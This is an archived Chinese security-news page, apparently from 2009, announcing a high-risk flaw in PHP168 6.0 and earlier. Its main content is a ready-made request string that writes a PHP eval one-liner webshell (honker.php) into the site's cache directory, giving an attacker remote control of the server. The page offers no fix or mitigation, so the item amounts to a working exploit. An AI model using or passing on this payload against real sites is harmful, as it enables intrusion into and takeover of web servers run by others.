ARP联盟图文中心下载中心手机频道最近更新软件最近更新文章网络热点
您当前的位置→图文中心新闻资讯安全播报最新PHP168 6.0及以下版本漏洞
站内搜索:

最新PHP168 6.0及以下版本漏洞


2009/9/9  编辑:佚名 来源:本站整理 

参考消息:http://www.arpun.com/危险等级:高
影响版本:PHP168 6.0以下版本 
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。 
测试语句:
     ?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?
 

更多精彩,请查看本类栏目: 新闻资讯 - 安全播报
除非注明,ARP联盟文章来于网络,投稿原创等,转载请以链接形式标明本文地址。
本文地址:http://www.arpun.com/article/4442.html

相关文章
  • ·[图文]最新发现超级螺旋星系比银河系明亮14倍
  • ·[图文]小白一键重装系统软件将推最新版本|UI界面图曝光
  • ·[图文]【最新“磁场地图”】揭晓神秘的太阳磁场变化
  • ·[图文]【最新研制的“变形材料”】可改变大小体积和硬度
  • ·[图文]科学家最新研究揭晓水星暗深色表面形成之谜
  • ·[图文]最新图像显示冥王星表面存在“冰山”
  • ·[图文]最新研究:地球上的水来自行星“忒伊亚”
  • ·[图文]【生物学家最新发现】没有Y染色体也能繁殖后代
  • 发表评论
    栏目列表
    阅读排行
    本类最新
    网站帮助 - 广告合作 - 下载声明 - 网站地图